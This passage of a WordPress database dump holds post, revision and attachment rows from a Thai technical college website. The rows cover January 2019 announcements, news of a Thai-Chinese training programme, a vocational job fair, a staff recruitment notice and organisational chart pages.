(5088, 3, '2019-01-22 14:51:02', '2019-01-22 07:51:02', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C%E0%B8%B0%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-%E0%B9%92%E0%B9%95%E0%B9%96%E0%B9%92.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาขาวิชาช่างยนต์ ประจำปีงบประมาณ ๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%a2-5', '', '', '2019-01-22 14:51:02', '2019-01-22 07:51:02', '', 0, 'http://www.technicrayong.ac.th/?p=5088', 153, 'post', '', 0),
(5089, 3, '2019-01-22 14:50:32', '2019-01-22 07:50:32', '', 'ประกาศ ประชาพิจารณ์ะครุภัณฑ์การศึกษา สาขาวิชาช่างยนต์ ประจำปีงบประมาณ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%b0%e0%b8%84%e0%b8%a3%e0%b8%b8', '', '', '2019-01-22 14:50:32', '2019-01-22 07:50:32', '', 5088, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-ประชาพิจารณ์ะครุภัณฑ์การศึกษา-สาขาวิชาช่างยนต์-ประจำปีงบประมาณ-๒๕๖๒.pdf', 0, 'attachment', 'application/pdf', 0),
(5090, 3, '2019-01-22 14:51:02', '2019-01-22 07:51:02', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C%E0%B8%B0%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-%E0%B9%92%E0%B9%95%E0%B9%96%E0%B9%92.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาขาวิชาช่างยนต์ ประจำปีงบประมาณ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '5088-revision-v1', '', '', '2019-01-22 14:51:02', '2019-01-22 07:51:02', '', 5088, 'http://www.technicrayong.ac.th/5088-revision-v1/', 0, 'revision', '', 0),
(5091, 3, '2019-01-22 15:09:55', '2019-01-22 08:09:55', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D748066682236189%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', 'วันอังคารที่ ๒๒ มกราคม ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบเกียรติบัตร ให้แก่นักศึกษา ระดับ ปวส. แผนกวิชาช่างไฟฟ้ากำลัง และแผนกวิชาช่างยนต์ ที่สำเร็จการศึกษา จากการเดินทางไปยังประเทศสาธารณรัฐประชาชนจีน ระหว่างวันที่ ๖ กรกฎาคม ๒๕๖๑ - ๘ มกราคม ๒๕๖๒ ที่ผ่านมา เพื่อฝึกอาชีพตามโครงการจัดการเรียนร่วมไทย-จีน ณ วิทยาลัยเทคนิคการรถไฟความเร็วสูงหูหนาน ประเทศสาธารณรัฐประชาชนจีน', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%92-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92', '', '', '2019-01-22 15:09:55', '2019-01-22 08:09:55', '', 0, 'http://www.technicrayong.ac.th/?p=5091', 152, 'post', '', 0),
(5092, 3, '2019-01-22 15:09:27', '2019-01-22 08:09:27', '', '50321308_748063982236459_5751719747813113856_o', '', 'inherit', 'closed', 'closed', '', '50321308_748063982236459_5751719747813113856_o', '', '', '2019-01-22 15:09:27', '2019-01-22 08:09:27', '', 5091, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/50321308_748063982236459_5751719747813113856_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5093, 3, '2019-01-22 15:09:55', '2019-01-22 08:09:55', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D748066682236189%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', 'วันอังคารที่ ๒๒ มกราคม ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบเกียรติบัตร ให้แก่นักศึกษา ระดับ ปวส. แผนกวิชาช่างไฟฟ้ากำลัง และแผนกวิชาช่างยนต์ ที่สำเร็จการศึกษา จากการเดินทางไปยังประเทศสาธารณรัฐประชาชนจีน ระหว่างวันที่ ๖ กรกฎาคม ๒๕๖๑ - ๘ มกราคม ๒๕๖๒ ที่ผ่านมา เพื่อฝึกอาชีพตามโครงการจัดการเรียนร่วมไทย-จีน ณ วิทยาลัยเทคนิคการรถไฟความเร็วสูงหูหนาน ประเทศสาธารณรัฐประชาชนจีน', '', 'inherit', 'closed', 'closed', '', '5091-revision-v1', '', '', '2019-01-22 15:09:55', '2019-01-22 08:09:55', '', 5091, 'http://www.technicrayong.ac.th/5091-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(5094, 3, '2019-01-22 15:14:27', '2019-01-22 08:14:27', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D748158365560354%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๒ มกราคม ๒๕๖๒ เข้าร่วมประชุมเตรียมความพร้อมในการจัดงาน “ตลาดนัดแรงงานอาชีวศึกษา โครงการมหกรรมสร้างงาน สร้างอาชีพ เฉลิมพระเกียรติ จังหวัดระยอง ปีงบประมาณ ๒๕๖๒ ภายใต้ชื่อ “Job & Career EEC’s RAYONG “ โดยศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก จังหวัดระยอง อาชีวศึกษาจังหวัดระยอง และ สำนักงานจัดหางานจังหวัดระยอง ระหว่างวันที่ ๒๕-๒๖ มกราคม ๒๕๖๒ ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%92-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92-2', '', '', '2019-01-22 15:14:27', '2019-01-22 08:14:27', '', 0, 'http://www.technicrayong.ac.th/?p=5094', 151, 'post', '', 0),
(5095, 3, '2019-01-22 15:14:00', '2019-01-22 08:14:00', '', '50742006_748157252227132_6178265650197168128_o', '', 'inherit', 'closed', 'closed', '', '50742006_748157252227132_6178265650197168128_o', '', '', '2019-01-22 15:14:00', '2019-01-22 08:14:00', '', 5094, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/50742006_748157252227132_6178265650197168128_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5096, 3, '2019-01-22 15:14:27', '2019-01-22 08:14:27', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D748158365560354%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๒ มกราคม ๒๕๖๒ เข้าร่วมประชุมเตรียมความพร้อมในการจัดงาน “ตลาดนัดแรงงานอาชีวศึกษา โครงการมหกรรมสร้างงาน สร้างอาชีพ เฉลิมพระเกียรติ จังหวัดระยอง ปีงบประมาณ ๒๕๖๒ ภายใต้ชื่อ “Job & Career EEC’s RAYONG “ โดยศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก จังหวัดระยอง อาชีวศึกษาจังหวัดระยอง และ สำนักงานจัดหางานจังหวัดระยอง ระหว่างวันที่ ๒๕-๒๖ มกราคม ๒๕๖๒ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5094-revision-v1', '', '', '2019-01-22 15:14:27', '2019-01-22 08:14:27', '', 5094, 'http://www.technicrayong.ac.th/5094-revision-v1/', 0, 'revision', '', 0),
(5097, 3, '2019-01-22 16:20:00', '2019-01-22 09:20:00', '', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว เจ้าหน้าที่ 3 อัตราedit', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-12', '', '', '2019-01-22 16:20:00', '2019-01-22 09:20:00', '', 5080, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว-เจ้าหน้าที่-3-อัตราedit.pdf', 0, 'attachment', 'application/pdf', 0),
(5098, 3, '2019-01-22 16:20:12', '2019-01-22 09:20:12', '', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'inherit', 'closed', 'closed', '', '5080-autosave-v1', '', '', '2019-01-22 16:20:12', '2019-01-22 09:20:12', '', 5080, 'http://www.technicrayong.ac.th/5080-autosave-v1/', 0, 'revision', '', 0),
(5099, 3, '2019-01-22 16:20:49', '2019-01-22 09:20:49', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-3-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'inherit', 'closed', 'closed', '', '5080-revision-v1', '', '', '2019-01-22 16:20:49', '2019-01-22 09:20:49', '', 5080, 'http://www.technicrayong.ac.th/5080-revision-v1/', 0, 'revision', '', 0),
(5101, 3, '2019-01-28 09:03:08', '2019-01-28 02:03:08', '', '28-1-2562 8-15-45', '', 'inherit', 'closed', 'closed', '', '28-1-2562-8-15-45', '', '', '2019-01-28 09:03:08', '2019-01-28 02:03:08', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/28-1-2562-8-15-45.png', 0, 'attachment', 'image/png', 0),
(5103, 3, '2019-01-28 09:03:46', '2019-01-28 02:03:46', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\"><img class=\"aligncenter size-full wp-image-5002\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\" alt=\"\" width=\"194\" height=\"248\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\"><img class=\"aligncenter wp-image-5003\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\" alt=\"\" width=\"398\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-5101 size-full\" src=\"/wp-content/uploads/2019/01/28-1-2562-8-15-45.png\" alt=\"\" width=\"927\" height=\"662\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2019-01-28 09:03:46', '2019-01-28 02:03:46', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(5104, 3, '2019-01-28 12:17:10', '2019-01-28 05:17:10', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.749831655393025&type=3\"><img class=\"aligncenter size-full wp-image-5105\" src=\"/wp-content/uploads/2019/01/28-1-2562-11-58-39.png\" alt=\"\" width=\"507\" height=\"804\" /></a>', 'ระหว่างวันที่ ๒๕-๒๖ มกราคม ๒๕๖๒ เปิดตลาดนัดแรงงานอาชีวศึกษาฯ จังหวัดระยอง ปีงบประมาณ ๒๕๖๒ ภายใต้ชื่อ “Job & Career EEC’s RAYONG” โดยศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก จังหวัดระยอง อาชีวศึกษาจังหวัดระยอง และ สำนักงานจัดหางานจังหวัดระยอง โดยได้รับเกียรติจาก ท่านยุทธพล องอาจอิทธิชัย รองผู้ว่าราชการจังหวัดระยอง มาเป็นประธานในพิธีเปิด และ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง ประธานกรรมการอาชีวศึกษาจังหวัดระยอง เป็นผู้กล่าวรายงานวัตถุประสงค์ในการจัดงานในครั้งนี้ ณ วิทยาลัยเทคนิคระยอง อำเภอเมืองระยอง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%b0%e0%b8%ab%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%95-%e0%b9%92%e0%b9%96-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2', '', '', '2019-01-28 12:17:10', '2019-01-28 05:17:10', '', 0, 'http://www.technicrayong.ac.th/?p=5104', 150, 'post', '', 0),
(5105, 3, '2019-01-28 11:59:20', '2019-01-28 04:59:20', '', '28-1-2562 11-58-39', '', 'inherit', 'closed', 'closed', '', '28-1-2562-11-58-39', '', '', '2019-01-28 11:59:20', '2019-01-28 04:59:20', '', 5104, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/28-1-2562-11-58-39.png', 0, 'attachment', 'image/png', 0),
(5106, 3, '2019-01-28 12:16:29', '2019-01-28 05:16:29', '', '50312641_749806232062234_4164681709343735808_o', '', 'inherit', 'closed', 'closed', '', '50312641_749806232062234_4164681709343735808_o', '', '', '2019-01-28 12:16:29', '2019-01-28 05:16:29', '', 5104, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/50312641_749806232062234_4164681709343735808_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5107, 3, '2019-01-28 12:17:10', '2019-01-28 05:17:10', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.749831655393025&type=3\"><img class=\"aligncenter size-full wp-image-5105\" src=\"/wp-content/uploads/2019/01/28-1-2562-11-58-39.png\" alt=\"\" width=\"507\" height=\"804\" /></a>', 'ระหว่างวันที่ ๒๕-๒๖ มกราคม ๒๕๖๒ เปิดตลาดนัดแรงงานอาชีวศึกษาฯ จังหวัดระยอง ปีงบประมาณ ๒๕๖๒ ภายใต้ชื่อ “Job & Career EEC’s RAYONG” โดยศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก จังหวัดระยอง อาชีวศึกษาจังหวัดระยอง และ สำนักงานจัดหางานจังหวัดระยอง โดยได้รับเกียรติจาก ท่านยุทธพล องอาจอิทธิชัย รองผู้ว่าราชการจังหวัดระยอง มาเป็นประธานในพิธีเปิด และ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง ประธานกรรมการอาชีวศึกษาจังหวัดระยอง เป็นผู้กล่าวรายงานวัตถุประสงค์ในการจัดงานในครั้งนี้ ณ วิทยาลัยเทคนิคระยอง อำเภอเมืองระยอง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '5104-revision-v1', '', '', '2019-01-28 12:17:10', '2019-01-28 05:17:10', '', 5104, 'http://www.technicrayong.ac.th/5104-revision-v1/', 0, 'revision', '', 0),
(5108, 3, '2019-01-28 13:35:49', '2019-01-28 06:35:49', '', '28-1-2562 13-33-49', '', 'inherit', 'closed', 'closed', '', '28-1-2562-13-33-49', '', '', '2019-01-28 13:35:49', '2019-01-28 06:35:49', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/28-1-2562-13-33-49.png', 0, 'attachment', 'image/png', 0),
(5109, 3, '2019-01-28 13:36:53', '2019-01-28 06:36:53', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\"><img class=\"aligncenter size-full wp-image-5002\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\" alt=\"\" width=\"194\" height=\"248\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\"><img class=\"aligncenter wp-image-5003\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\" alt=\"\" width=\"398\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-5101 size-full\" src=\"/wp-content/uploads/2019/01/28-1-2562-8-15-45.png\" alt=\"\" width=\"927\" height=\"662\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-5108\" src=\"/wp-content/uploads/2019/01/28-1-2562-13-33-49.png\" alt=\"\" width=\"952\" height=\"632\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2019-01-28 13:36:53', '2019-01-28 06:36:53', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(5111, 3, '2019-01-28 13:56:04', '2019-01-28 06:56:04', '', '2125121251', '', 'inherit', 'closed', 'closed', '', '2125121251', '', '', '2019-01-28 13:56:04', '2019-01-28 06:56:04', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/2125121251.png', 0, 'attachment', 'image/png', 0),
(5112, 3, '2019-01-28 13:56:33', '2019-01-28 06:56:33', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\"><img class=\"aligncenter size-full wp-image-5002\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\" alt=\"\" width=\"194\" height=\"248\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\"><img class=\"aligncenter wp-image-5003\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\" alt=\"\" width=\"398\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-5101 size-full\" src=\"/wp-content/uploads/2019/01/28-1-2562-8-15-45.png\" alt=\"\" width=\"927\" height=\"662\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-5108\" src=\"/wp-content/uploads/2019/01/28-1-2562-13-33-49.png\" alt=\"\" width=\"952\" height=\"632\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-5111\" src=\"/wp-content/uploads/2019/01/2125121251.png\" alt=\"\" width=\"950\" height=\"826\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2019-01-28 13:56:33', '2019-01-28 06:56:33', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(5113, 3, '2019-01-28 14:21:38', '2019-01-28 07:21:38', '', '28-1-2562 14-20-57', '', 'inherit', 'closed', 'closed', '', '28-1-2562-14-20-57', '', '', '2019-01-28 14:21:38', '2019-01-28 07:21:38', '', 1753, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/28-1-2562-14-20-57.png', 0, 'attachment', 'image/png', 0),
(5114, 3, '2019-01-28 14:22:06', '2019-01-28 07:22:06', '<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-5113\" src=\"/wp-content/uploads/2019/01/28-1-2562-14-20-57.png\" alt=\"\" width=\"531\" height=\"351\" />\r\n<h3><a href=\"https://drive.google.com/file/d/0B7ghyAKLnNIXSWRFUVVoQUZJSFk/view\"><span style=\"color: #0000ff;\">โลโก้วิทยาลัยฯ</span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน.pdf\">คู่มือการประเมินสถานศึกษาอาชีวศึกษา เพื่อรับรางวัลพระราชทาน</a></h3>\r\n<h3><strong><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%84%E0%B8%A7%E0%B8%B2%E0%B8%A1%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%AA%E0%B8%96%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B9%82%E0%B8%94%E0%B8%A2%E0%B8%95%E0%B9%89%E0%B8%99%20%E0%B8%9C%E0%B8%AD_%E0%B8%AA%E0%B8%B4%E0%B8%A3%E0%B8%B4%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B9%8C.ppt\">ความรู้ด้านการประกันคุณภาพ</a></strong></h3>\r\n<h3><strong><a 